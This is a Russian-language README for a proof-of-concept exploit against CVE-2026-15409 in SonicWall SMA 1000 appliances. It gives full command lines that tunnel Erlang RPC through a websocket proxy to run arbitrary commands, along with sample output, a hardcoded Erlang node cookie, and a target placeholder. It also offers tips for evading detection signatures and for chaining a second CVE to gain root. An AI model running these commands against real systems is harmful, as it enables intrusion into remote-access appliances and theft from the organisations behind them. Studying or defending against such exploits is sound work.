CVE-2026-15409
Этот репозиторий содержит эксплойт доказательства концепции для CVE-2026-15409. Он устанавливает удалённое выполнение кода без прав root на SonicWall SMA 1000, реализуя протокол Erlang, ожидаемый на localhost:1050, и туннелируя его через веб-сокет для чтения/записи файлов и произвольного выполнения кода через RPC-вызовы.
Использование
# python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --exec 'whoami && id && pwd && hostname'
Authenticated to [email protected]
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 => couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma
Примечания по эксплуатации и обнаружению
- Этот эксплойт нацелен на службу WorkPlace (обычно слушает порт 443), которая, вероятно, включена почти всё время (требует настройки метода аутентификации пользователя, например, базового AD)
- Разработан против ex_sra_vm_12.5.0-02002.ova с применённым июньским исправлением 2026 года (последним до обновления)
- Пример: python3 cve-2026-15409.py --ws-url 'wss://TARGET_IP_HERE/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'touch /var/tmp/remote_code_execution'
- Куки Erlang-узла, используемые для эксплуатации, должны быть одинаковыми на всех целях; они жёстко заданы для процесса Erlang на localhost:1050, согласно тестированию.
- Произвольные значения bmID в целом работают, если значение начинается с "-3389". Не пишите сигнатуры против "serviceType=SSH", так как есть альтернативы, например TELNET, которые тоже работают. 0.0.0.0 можно заменить на другие форматы адресов.
- Порт 1050 — это техника эксплуатации, а не жёсткое требование для взлома. EITW наблюдали, атакующим порт 8188, хотя кажется проще использовать просто 1050. Возможно, есть и другие службы на разных портах, которые тоже можно эксплуатировать. Выполнение кода в реальных условиях, скорее всего, будет происходить в других контекстах пользователей, не couchdb, из-за различий в используемых техниках.
- Атакующий может повысить привилегии до root с помощью эксплойта обхода xmlrpc "remove hotfix" CVE-2026-15410 (нацелен на localhost:8188) после получения оболочки.